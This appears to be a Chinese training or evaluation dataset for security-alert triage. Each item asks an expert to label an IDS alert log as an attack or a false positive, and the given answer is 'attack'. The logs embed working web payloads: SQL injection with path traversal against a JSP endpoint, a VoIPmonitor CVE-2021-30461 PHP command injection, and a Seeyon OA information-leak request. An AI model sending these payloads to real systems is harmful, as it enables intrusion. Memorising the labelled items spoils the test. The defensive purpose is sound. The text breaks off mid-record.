"SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','830294251')),3,32)),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:16:18", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "3961ad2c6852d4a0c6e86a9b99ba0c58", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688158", "code_language": "其他", "public_date": "2018-08-08 12:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "123", "h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001483", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "103", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrU1VCU1RSSU5HKHN5cy5mbl9zcWx2YXJiYXNldG9zdHIoSEFTSEJZVEVTKCUyN01ENSUyNywlMjc4MzAyOTQyNTElMjcpKSwzLDMyKSksbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbC0tIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_962ec0c610d9aa7921b8fe65257eebbb", "access_time": "2024-11-27 14:16:18", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440707-SQL注入攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12499", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688178", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732688178, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 470, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 450, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "223.160.174.104", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 12499}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','830294251')),3,32)),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:16:18", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "4a381433886e37721b3ade444f084734", "xff": "", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688158", "code_language": "通用", "public_date": "2018-08-16 18:57:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "470", "h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "450", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrU1VCU1RSSU5HKHN5cy5mbl9zcWx2YXJiYXNldG9zdHIoSEFTSEJZVEVTKCUyN01ENSUyNywlMjc4MzAyOTQyNTElMjcpKSwzLDMyKSksbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbC0tIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_6f6f5c2912b7e05e83a2f4d2ff8ee254", "access_time": "2024-11-27 14:16:18", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12499", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27830294251%27)),3,32)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688171", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688171, "vuln_harm": "使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 35, "uri": "/index.php", "dport": 30001, "vuln_name": "VoIPmonitor 命令执行漏洞(CVE-2021-30461)", "rsp_status": 0, "code_language": "", "solution": "官方已经修复了该漏洞,请升级到最新版本:https://www.voipmonitor.org/", "hit_start": 15, "detail_info": "VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。\r\n使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。\r\n漏洞影响:\r\nVoIPmonitor < 24.60", "xff": "", "sip": "223.160.174.104", "vuln_desc": "VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。\r\n使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。\r\n漏洞影响:\r\nVoIPmonitor < 24.60", "public_date": "2022-07-20 15:36:18", "sport": 12519}, "detail_info": "VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。\r\n使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。\r\n漏洞影响:\r\nVoIPmonitor < 24.60", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/index.php", "first_access_time": "2024-11-27 14:16:11", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "VoIPmonitor 命令执行漏洞(CVE-2021-30461)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "recheck": "annen", "sip_ioc_dip": "861950bdcc74ab551d660e92acb7c244", "xff": "", "vuln_desc": "VoIPmonitor是“具有在Linux上运行的SIP RTP和RTCP VoIP协议的具有商业前端的开源网络数据包嗅探器”。\r\n使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。\r\n漏洞影响:\r\nVoIPmonitor < 24.60", "attack_chain": "0x02020000", "vuln_harm": "使用通过Web界面到达的用户提供的数据,允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688150", "code_language": "", "public_date": "2022-07-20 15:36:18", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "35", "h_proto_version": "HTTP/1.1", "uri": "/index.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002106a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "VoIPmonitor 命令执行漏洞(CVE-2021-30461)", "attack_type": "命令执行", "is_web_attack": "1", "spooldir": "test%22.system%28id%29.%22", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方已经修复了该漏洞,请升级到最新版本:https://www.voipmonitor.org/", "hit_start": "15", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDQ5DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTgNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "U1BPT0xESVI9dGVzdCUyMi5zeXN0ZW0lMjhpZCUyOS4lMjImcmVjaGVjaz1hbm5lbg==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_64bf11fece7b17fb20321d5f8e990ce2", "access_time": "2024-11-27 14:16:11", "content-length": "49", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded; charset=UTF-8", "sip": "223.160.174.104", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 49\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "SPOOLDIR=test%22.system%28id%29.%22&recheck=annen", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570730-VoIPmonitor 命令执行漏洞(CVE-2021-30461)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12519", "h_url": "/index.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688170", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732688170, "vuln_harm": "致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 81, "uri": "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", "dport": 30001, "vuln_name": "致远OA A6 用户敏感信息泄露漏洞", "rsp_status": 0, "code_language": "", "solution": "官方已经修复了该漏洞,请将受影响系统升级到最新版,链接:https://www.seeyon.com/", "hit_start": 61, "detail_info": "致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击", "xff": "", "sip": "223.160.174.104", "vuln_desc": "致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击", "public_date": "2022-06-10 11:26:46", "sport": 12517}, "detail_info": "致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/yyoa/DownExcelBeanServlet", "state": "1", "first_access_time": "2024-11-27 14:16:10", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "致远OA A6 用户敏感信息泄露漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d6f1a30a33d2d8080e8afd0ed798205b", "xff": "", "vuln_desc": "致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击", "attack_chain": "0x01020000", "vuln_harm": "致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688150", "code_language": "", "public_date": "2022-06-10 11:26:46", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "81", "h_proto_version": "HTTP/1.1", "uri": "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020f47", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "致远OA A6 用户敏感信息泄露漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方已经修复了该漏洞,请将受影响系统升级到最新版,链接:https://www.seeyon.com/", "hit_start": "61", "skyeye_id": "", "payload": {"req_header": "R0VUIC95eW9hL0Rvd25FeGNlbEJlYW5TZXJ2bGV0P2NvbnRlbnR0eXBlPXVzZXJuYW1lJmNvbnRlbnR2YWx1ZT0mc3RhdGU9MSZwZXJfaWQ9MCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "per_id": "0", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_4a72a260af15e75ca3a165008983f038", "access_time": "2024-11-27 14:16:10", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/yyoa/DownExcelBeanServlet", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "contenttype": "username", "req_header": "GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570439-致远OA A6 用户敏感信息泄露漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12517", "h_url": "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688169", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "其他攻击利用", "password": "123456", "_origin": {"write_date": 1732688169, "vuln_harm": "攻击者可能在客户端与目标系统之间进行流量监控和窃听,导致密码丢失。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 31, "uri": "/server/index.php?s=/api/user/login", "dport": 30001, "vuln_name": "发现明文口令传输", "rsp_status": 0, "code_language": "", "solution": "建议在网络中传输密码时先进行加密,防止攻击者窃取密码。", "hit_start": 11, "detail_info": "发现网络中存在明文口令传输,可能导致攻击者使用暴力破解或者监听流量从而能够登录目标系统。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现网络中存在明文口令传输,可能导致攻击者使用暴力破解或者监听流量从而能够登录目标系统。", "public_date": "2023-03-17 16:16:08", "sport": 12514}, "detail_info": "发现网络中存在明文口令传输,可能导致攻击者使用暴力破解或者监听流量从而能够登录目标系统。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/server/index.php", "first_access_time": "2024-11-27 14:16:09", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现明文口令传输", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "934f4c547245d89a1b2625c992231847", "xff": "", "vuln_desc": "发现网络中存在明文口令传输,可能导致攻击者使用暴力破解或者监听流量从而能够登录目标系统。", "attack_chain": "0x02050000", "vuln_harm": "攻击者可能在客户端与目标系统之间进行流量监控和窃听,导致密码丢失。", "dport": "30001", "alert_devip": "172.31.191.57", 